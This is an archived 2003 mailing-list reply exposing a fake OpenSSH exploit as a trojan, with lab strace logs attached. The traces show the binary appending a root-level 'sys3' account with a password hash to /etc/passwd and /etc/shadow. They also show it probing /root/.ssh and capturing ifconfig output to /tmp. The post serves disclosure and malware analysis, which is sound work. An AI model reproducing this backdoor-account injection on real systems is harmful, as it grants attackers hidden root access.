lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <1063949231.2373.20.camel@localhost>
From: chris at neitzert.com (christopher neitzert)
Subject: Re: new openssh exploit in the wild! * is
	FAKE AS SH@!*

Lars,

What you say is true.

For those of you who are interested attached is an strace of this bogus
exploit that I ran in my lab on disposable systems in captive network.

Note, on the parent PID file I edited out quite a bit of repetitive
bogus wait statements, no sense in filling your mailboxes with 400k
lines of crap.

...

Chris

On Fri, 2003-09-19 at 03:07, Lars Olsson wrote:
> On Fri, 19 Sep 2003, Vitaly Osipov wrote:
> 
> > This means that the original poster (gordon last) made it up himself, because he is saying :
> >
> > >> > i looked at this piece of exploit... it is binary so i'am not sure if
> > >> > this is a trojan or a backdoor or a virus. but i can't see anything
> > >> > strange while sniffing the exploit traffic. and i got root on serveral
> > >> > of my openbsd boxes with that. the bruteforcer seems to be very good.
> >
> > which is obviously not true. Btw as far as I understand, the troyan code is triggered when
> > the "exploit" is run with the offset specified, and not in a "bruteforcing" mode.
> >
> 
> The trojan seems to be triggered in both cases, providing that the
> "bruteforcing" terminates. I haven't test run the code but I did a very
> quick reverse of the binary. It connects to the remote sshd but only
> sends the key used for descrmbling the trojan code while it pretends
> to search for offsets.
> 
> 
> /Lars
-- 
Christopher Neitzert http://www.neitzert.com/~chris

-------------- next part --------------
execve("./theosshucksass", ["./theosshucksass", "192.168.0.34"], [/* 20 vars */]) = 0
uname({sys="Linux", node="f00f", ...})  = 0
brk(0)                                  = 0x804a450
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000
open("/etc/ld.so.preload", O_RDONLY)    = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=31716, ...}) = 0
old_mmap(NULL, 31716, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40017000
close(3)                                = 0
open("/lib/tls/libc.so.6", O_RDONLY)    = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220W\1"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1536292, ...}) = 0
old_mmap(0x42000000, 1261416, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x42000000
old_mmap(0x4212f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0x12f000) = 0x4212f000
old_mmap(0x42132000, 8040, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x42132000
close(3)                                = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4001f000
set_thread_area({entry_number:-1 -> 6, base_addr:0x4001f280, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
munmap(0x40017000, 31716)               = 0
brk(0)                                  = 0x804a450
brk(0x804b450)                          = 0x804b450
brk(0)                                  = 0x804b450
brk(0x804c000)                          = 0x804c000
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(4, 1), ...}) = 0
ioctl(1, SNDCTL_TMR_TIMEBASE, {B38400 opost isig icanon echo ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000
write(1, "theosshucksass.c - remote openss"..., 59) = 59
write(1, "by raazab/m0nkeyhack@...ermarkt."..., 35) = 35
getuid32()                              = 0
write(1, "\nr00ting box...\n", 16)      = 16
write(1, "\thost: 192.168.0.34\n", 20)  = 20
write(1, "\toffset: (null)\n\n", 17)    = 17
write(1, "[*] building socket\n", 20)   = 20
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
write(1, "[*] connecting to victim\n", 25) = 25
connect(3, {sa_family=AF_INET, sin_port=htons(22), sin_addr=inet_addr("192.168.0.34")}, 16) = 0
recv(3, "SSH-1.99-OpenSSH_3.5p1\n", 255, 0) = 23
write(1, "\tVictim: SSH-1.99-OpenSSH_3.5p1\n", 32) = 32
write(1, "\n", 1)                       = 1
write(1, "[*] no offset given: brute force"..., 63) = 63
write(1, "\tTrying 0xe56ac71c\t", 19)   = 19
write(3, "gdfea#\0", 7)                 = 7
write(1, ":-/\n", 4)                    = 4
write(1, "\tTrying 0xe56ac720\t", 19)   = 19
write(3, "gdfea#\0", 7)                 = 7
write(1, ":-/\n", 4)                    = 4
write(1, "\tTrying 0xe56ac724\t", 19)   = 19
write(3, "gdfea#\0", 7)                 = 7
write(1, ":-/\n", 4)                    = 4
write(1, "\tTrying 0xe56ac728\t", 19)   = 19
write(3, "gdfea#\0", 7)                 = 7
write(1, ":-/\n", 4)                    = 4
write(1, "\tTrying 0xe56ac72c\t", 19)   = 19
write(3, "gdfea#\0", 7)                 = 7
write(1, ":-/\n", 4)                    = 4
write(1, "\tTrying 0xe56ac730\t", 19)   = 19
write(3, "gdfea#\0", 7)                 = 7
write(1, ":-/\n", 4)                    = 4
write(1, "\tTrying 0xe56ac734\t", 19)   = 19
write(3, "gdfea#\0", 7)                 = 7
write(1, ":-/\n", 4)                    = 4
write(1, "\tTrying 0xe56ac738\t", 19)   = 19
write(3, "gdfea#\0", 7)                 = 7
write(1, ":-/\n", 4)                    = 4
write(1, "\tTrying 0xe56ac73c\t", 19)   = 19
write(3, "gdfea#\0", 7)                 = 7
write(1, ":-)\n", 4)                    = 4
write(1, "[*] Gotcha!\n", 12)           = 12
write(1, "[*] reconnecting \n", 18)     = 18
close(3)                                = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
write(1, "[*] connecting to victim\n", 25) = 25
connect(3, {sa_family=AF_INET, sin_port=htons(22), sin_addr=inet_addr("192.168.0.34")}, 16) = 0
recv(3, "SSH-1.99-OpenSSH_3.5p1\n", 255, 0) = 23
write(1, "\tVictim: SSH-1.99-OpenSSH_3.5p1\n", 32) = 32
write(1, "\n", 1)                       = 1
write(1, "[*] calculating nops\n", 21)  = 21
write(1, "[*] sending nops\n", 17)      = 17
write(3, "\220\220\220\220\220\220\220\220\220\220\220\220\220\220"..., 23) = 23
write(1, "[*] sending shellcode\n", 22) = 22
pipe([4, 5])                            = 0
vfork()                                 = 1062
close(5) = 0
write(3, "\210", 1)                                = 1
write(1, "[*] trying to spawn remote shell"..., 47)                              = 47
write(3, "gdfea#", 6)                                = 6
write(1, "[*] closing socket\n\n", 20) = 20
close(3)                                = 0
write(1, "all seems fine... try to connect"..., 63) = 63
munmap(0x40017000, 4096) = 0
exit_group(0)                           = ?
-------------- next part --------------
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
close(4) = 0
dup2(5, 1) = 1
close(5) = 0
execve("/bin/sh", ["sh", "-c", "(echo \"sys3:x:0:103::/:/bin/sh\" "...], [/* 20 vars */]) = 0
uname({sys="Linux", node="f00f", ...}) = 0
brk(0)                = 0x80e5b54
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000
open("/etc/ld.so.preload", O_RDONLY)    = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=31716, ...}) = 0
old_mmap(NULL, 31716, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40017000
close(4)                                = 0
open("/lib/libtermcap.so.2", O_RDONLY)  = 4
read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\r\0"..., 512) = 512
fstat64(4, {st_mode=S_IFREG|0755, st_size=11784, ...}) = 0
old_mmap(NULL, 14856, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x4001f000
old_mmap(0x40022000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x2000) = 0x40022000
close(4)                                = 0
open("/lib/libdl.so.2", O_RDONLY)       = 4
read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30"..., 512) = 512
fstat64(4, {st_mode=S_IFREG|0755, st_size=15900, ...}) = 0
old_mmap(NULL, 13176, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x40023000
old_mmap(0x40026000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x2000) = 0x40026000
close(4)                                = 0
open("/lib/tls/libc.so.6", O_RDONLY)    = 4
read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220W\1"..., 512) = 512
fstat64(4, {st_mode=S_IFREG|0755, st_size=1536292, ...}) = 0
old_mmap(0x42000000, 1261416, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x42000000
old_mmap(0x4212f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x12f000) = 0x4212f000
old_mmap(0x42132000, 8040, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x42132000
close(4)                                = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40027000
set_thread_area({entry_number:-1 -> 6, base_addr:0x40027660, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
munmap(0x40017000, 31716)               = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = 4
close(4)                                = 0
brk(0)                                  = 0x80e5b54
brk(0)                                  = 0x80e5b54
brk(0x80e6000)                          = 0x80e6000
open("/usr/lib/locale/locale-archive", O_RDONLY|O_LARGEFILE) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=30301680, ...}) = 0
mmap2(NULL, 2097152, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40028000
close(4)                                = 0
brk(0)                                  = 0x80e6000
brk(0x80e7000)                          = 0x80e7000
brk(0)                                  = 0x80e7000
brk(0x80e8000)                          = 0x80e8000
getuid32()                              = 0
getgid32()                              = 0
geteuid32()                             = 0
getegid32()                             = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
brk(0)                                  = 0x80e8000
brk(0x80e9000)                          = 0x80e9000
time(NULL)                              = 1063931038
brk(0)                                  = 0x80e9000
brk(0x80ea000)                          = 0x80ea000
open("/etc/mtab", O_RDONLY)             = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=264, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000
read(4, "/dev/hdb2 / ext3 rw 0 0\nnone /pr"..., 4096) = 264
close(4)                                = 0
munmap(0x40017000, 4096)                = 0
open("/proc/meminfo", O_RDONLY)         = 4
fstat64(4, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000
read(4, "        total:    used:    free:"..., 1024) = 653
close(4)                                = 0
munmap(0x40017000, 4096)                = 0
brk(0)                                  = 0x80ea000
brk(0x80eb000)                          = 0x80eb000
rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0
uname({sys="Linux", node="f00f", ...})  = 0
stat64("/root/theothisisourpresentforyou", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
getpid()                                = 1062
getppid()                               = 1
stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
stat64("/usr/local/sbin/sh", 0xbffff1b0) = -1 ENOENT (No such file or directory)
stat64("/usr/local/bin/sh", 0xbffff1b0) = -1 ENOENT (No such file or directory)
stat64("/sbin/sh", 0xbffff1b0)          = -1 ENOENT (No such file or directory)
stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=626028, ...}) = 0
access("/bin/sh", X_OK)                 = 0
stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=626028, ...}) = 0
access("/bin/sh", X_OK)                 = 0
getpgrp()                               = 1060
rt_sigaction(SIGCHLD, {0x8076d30, [], SA_RESTORER, 0x420276f8}, {SIG_DFL}, 8) = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
brk(0)                                  = 0x80eb000
brk(0x80ec000)                          = 0x80ec000
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
open("/usr/lib/gconv/gconv-modules.cache", O_RDONLY) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=21040, ...}) = 0
mmap2(NULL, 21040, PROT_READ, MAP_SHARED, 4, 0) = 0x40017000
close(4)                                = 0
brk(0)                                  = 0x80ec000
brk(0x80ed000)                          = 0x80ed000
brk(0)                                  = 0x80ed000
brk(0x80ee000)                          = 0x80ee000
rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|0x11, <ignored>, <ignored>, 0x400276a8) = 1063
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigaction(SIGINT, {0x8075db0, [], SA_RESTORER, 0x420276f8}, {SIG_DFL}, 8) = 0
wait4(-1, 
-------------- next part --------------
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
getpid()                                = 1063
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0
rt_sigaction(SIGCHLD, {SIG_DFL}, {0x8076d30, [], SA_RESTORER, 0x420276f8}, 8) = 0
rt_sigaction(SIGCHLD, {0x8076d30, [], SA_RESTORER, 0x420276f8}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGINT, {0x8085950, [], SA_RESTORER, 0x420276f8}, {SIG_DFL}, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
open("/dev/null", O_WRONLY|O_CREAT|O_TRUNC|O_LARGEFILE, 0666) = 4
dup2(4, 1)                              = 1
close(4)                                = 0
dup2(1, 2)                              = 2
open("/etc/passwd", O_WRONLY|O_APPEND|O_CREAT|O_LARGEFILE, 0666) = 4
fcntl64(1, F_GETFD)                     = 0
fcntl64(1, F_DUPFD, 10)                 = 10
fcntl64(1, F_GETFD)                     = 0
fcntl64(10, F_SETFD, FD_CLOEXEC)        = 0
dup2(4, 1)                              = 1
close(4)                                = 0
write(1, "sys3:x:0:103::/:/bin/sh\n", 24) = 24
dup2(10, 1)                             = 1
fcntl64(10, F_GETFD)                    = 0x1 (flags FD_CLOEXEC)
close(10)                               = 0
open("/etc/shadow", O_WRONLY|O_APPEND|O_CREAT|O_LARGEFILE, 0666) = 4
fcntl64(1, F_GETFD)                     = 0
fcntl64(1, F_DUPFD, 10)                 = 10
fcntl64(1, F_GETFD)                     = 0
fcntl64(10, F_SETFD, FD_CLOEXEC)        = 0
dup2(4, 1)                              = 1
close(4)                                = 0
write(1, "sys3:$1$nWXmkX74$Ws8fX/MFI3.j5HK"..., 59) = 59
dup2(10, 1)                             = 1
fcntl64(10, F_GETFD)                    = 0x1 (flags FD_CLOEXEC)
close(10)                               = 0
rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|0x11, <ignored>, <ignored>, 0x400276a8) = 1064
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigaction(SIGINT, {0x8075db0, [], SA_RESTORER, 0x420276f8}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0
wait4(-1, [WIFEXITED(s) && WEXITSTATUS(s) == 0], 0, NULL) = 1064
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCHLD (Child exited) @ 0 (0) ---
wait4(-1, 0xbfffec34, WNOHANG, NULL)    = -1 ECHILD (No child processes)
sigreturn()                             = ? (mask now [])
rt_sigaction(SIGINT, {0x8085950, [], SA_RESTORER, 0x420276f8}, {0x8075db0, [], SA_RESTORER, 0x420276f8}, 8) = 0
open("/root/", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 4
fstat64(4, {st_mode=S_IFDIR|0750, st_size=4096, ...}) = 0
fcntl64(4, F_SETFD, FD_CLOEXEC)         = 0
brk(0)                                  = 0x80ee000
brk(0x80f0000)                          = 0x80f0000
getdents64(4, /* 30 entries */, 4096)   = 1008
getdents64(4, /* 0 entries */, 4096)    = 0
close(4)                                = 0
stat64("/root/.ssh", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
lstat64("/root/.ssh/known_hosts", {st_mode=S_IFREG|0644, st_size=1541, ...}) = 0
stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
stat64("/usr/local/sbin/cat", 0xbfffeec0) = -1 ENOENT (No such file or directory)
stat64("/usr/local/bin/cat", 0xbfffeec0) = -1 ENOENT (No such file or directory)
stat64("/sbin/cat", 0xbfffeec0)         = -1 ENOENT (No such file or directory)
stat64("/bin/cat", {st_mode=S_IFREG|0755, st_size=14364, ...}) = 0
access("/bin/cat", X_OK)                = 0
stat64("/bin/cat", {st_mode=S_IFREG|0755, st_size=14364, ...}) = 0
access("/bin/cat", X_OK)                = 0
rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|0x11, <ignored>, <ignored>, 0x400276a8) = 1065
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8)                           = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigaction(SIGINT, {0x8075db0, [], SA_RESTORER, 0x420276f8}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0
wait4(-1, [WIFEXITED(s) && WEXITSTATUS(s) == 0], 0, NULL) = 1065
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCHLD (Child exited) @ 0 (0) ---
wait4(-1, 0xbfffecd4, WNOHANG, NULL)    = -1 ECHILD (No child processes)
sigreturn()                             = ? (mask now [])
rt_sigaction(SIGINT, {0x8085950, [], SA_RESTORER, 0x420276f8}, {0x8075db0, [], SA_RESTORER, 0x420276f8}, 8) = 0
stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
stat64("/usr/local/sbin/find", 0xbfffef60) = -1 ENOENT (No such file or directory)
stat64("/usr/local/bin/find", 0xbfffef60) = -1 ENOENT (No such file or directory)
stat64("/sbin/find", 0xbfffef60)        = -1 ENOENT (No such file or directory)
stat64("/bin/find", 0xbfffef60)         = -1 ENOENT (No such file or directory)
stat64("/usr/sbin/find", 0xbfffef60)    = -1 ENOENT (No such file or directory)
stat64("/usr/bin/find", {st_mode=S_IFREG|0755, st_size=51028, ...}) = 0
access("/usr/bin/find", X_OK)           = 0
stat64("/usr/bin/find", {st_mode=S_IFREG|0755, st_size=51028, ...}) = 0
access("/usr/bin/find", X_OK)           = 0
rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|0x11, <ignored>, <ignored>, 0x400276a8) = 1066
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8)                           = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigaction(SIGINT, {0x8075db0, [], SA_RESTORER, 0x420276f8}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0
wait4(-1, [WIFEXITED(s) && WEXITSTATUS(s) == 1], 0, NULL) = 1066
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCHLD (Child exited) @ 0 (0) ---
wait4(-1, 0xbfffed74, WNOHANG, NULL)    = -1 ECHILD (No child processes)
sigreturn()                             = ? (mask now [])
rt_sigaction(SIGINT, {0x8085950, [], SA_RESTORER, 0x420276f8}, {0x8075db0, [], SA_RESTORER, 0x420276f8}, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
pipe([4, 5])                            = 0
rt_sigprocmask(SIG_BLOCK, [INT CHLD], [CHLD], 8) = 0
clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|0x11, <ignored>, <ignored>, 0x400276a8) = 1067
rt_sigprocmask(SIG_SETMASK, [CHLD], NULL, 8) = 0
close(5)                                = 0
close(5)       = -1 EBADF (Bad file descriptor)
rt_sigprocmask(SIG_BLOCK, [INT CHLD], [CHLD], 8) = 0
clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|0x11, <ignored>, <ignored>, 0x400276a8) = 1068
rt_sigprocmask(SIG_SETMASK, [CHLD], NULL, 8) = 0
close(4)                                = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [CHLD], 8)                     = 0
rt_sigprocmask(SIG_SETMASK, [CHLD], NULL, 8)                         = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [CHLD], 8)           = 0
rt_sigaction(SIGINT, {0x8075db0, [], SA_RESTORER, 0x420276f8}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0
wait4(-1, 
-------------- next part --------------
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
getpid()                                = 1064
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGINT, {SIG_DFL}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGCHLD, {SIG_DFL}, {0x8076d30, [], SA_RESTORER, 0x420276f8}, 8) = 0
open("/tmp/.tmp", O_WRONLY|O_CREAT|O_TRUNC|O_LARGEFILE, 0666) = 4
dup2(4, 1)                              = 1
close(4)                                = 0
execve("/sbin/ifconfig", ["/sbin/ifconfig", "-a"], [/* 19 vars */]) = 0
uname({sys="Linux", node="f00f", ...})  = 0
brk(0)                                  = 0x8055fe8
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000
open("/etc/ld.so.preload", O_RDONLY)    = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=31716, ...}) = 0
old_mmap(NULL, 31716, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40017000
close(4)                                = 0
open("/lib/tls/libc.so.6", O_RDONLY)    = 4
read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220W\1"..., 512) = 512
fstat64(4, {st_mode=S_IFREG|0755, st_size=1536292, ...}) = 0
old_mmap(0x42000000, 1261416, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x42000000
old_mmap(0x4212f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x12f000) = 0x4212f000
old_mmap(0x42132000, 8040, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x42132000
close(4)                                = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4001f000
set_thread_area({entry_number:-1 -> 6, base_addr:0x4001f280, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
munmap(0x40017000, 31716)               = 0
brk(0)                                  = 0x8055fe8
brk(0x8056fe8)                          = 0x8056fe8
brk(0)                                  = 0x8056fe8
brk(0x8057000)                          = 0x8057000
open("/usr/lib/locale/locale-archive", O_RDONLY|O_LARGEFILE) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=30301680, ...}) = 0
mmap2(NULL, 2097152, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40020000
close(4)                                = 0
uname({sys="Linux", node="f00f", ...})  = 0
access("/proc/net", R_OK)               = 0
access("/proc/net/unix", R_OK)          = 0
socket(PF_UNIX, SOCK_DGRAM, 0)          = 4
socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 5
access("/proc/net/if_inet6", R_OK)      = -1 ENOENT (No such file or directory)
access("/proc/net/ax25", R_OK)          = -1 ENOENT (No such file or directory)
access("/proc/net/nr", R_OK)            = -1 ENOENT (No such file or directory)
access("/proc/net/rose", R_OK)          = -1 ENOENT (No such file or directory)
access("/proc/net/ipx", R_OK)           = -1 ENOENT (No such file or directory)
access("/proc/net/appletalk", R_OK)     = -1 ENOENT (No such file or directory)
access("/proc/sys/net/econet", R_OK)    = -1 ENOENT (No such file or directory)
access("/proc/sys/net/ash", R_OK)       = -1 ENOENT (No such file or directory)
access("/proc/net/x25", R_OK)           = -1 ENOENT (No such file or directory)
open("/proc/net/dev", O_RDONLY)         = 6
fstat64(6, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000
read(6, "Inter-|   Receive               "..., 1024) = 569
read(6, "", 1024)                       = 0
close(6)                                = 0
munmap(0x40017000, 4096)                = 0
open("/usr/share/locale/locale.alias", O_RDONLY) = 6
fstat64(6, {st_mode=S_IFREG|0644, st_size=2601, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000
read(6, "# Locale name alias data base.\n#"..., 4096) = 2601
brk(0)                                  = 0x8057000
brk(0x8058000)                          = 0x8058000
read(6, "", 4096)                       = 0
close(6)                                = 0
munmap(0x40017000, 4096)                = 0
open("/usr/share/locale/en_US.UTF-8/LC_MESSAGES/net-tools.mo", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/share/locale/en_US.utf8/LC_MESSAGES/net-tools.mo", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/share/locale/en_US/LC_MESSAGES/net-tools.mo", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/share/locale/en.UTF-8/LC_MESSAGES/net-tools.mo", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/share/locale/en.utf8/LC_MESSAGES/net-tools.mo", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/share/locale/en/LC_MESSAGES/net-tools.mo", O_RDONLY) = -1 ENOENT (No such file or directory)
ioctl(5, 0x8912, 0xbffff240)            = 0
open("/proc/net/dev", O_RDONLY)         = 6
fstat64(6, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000
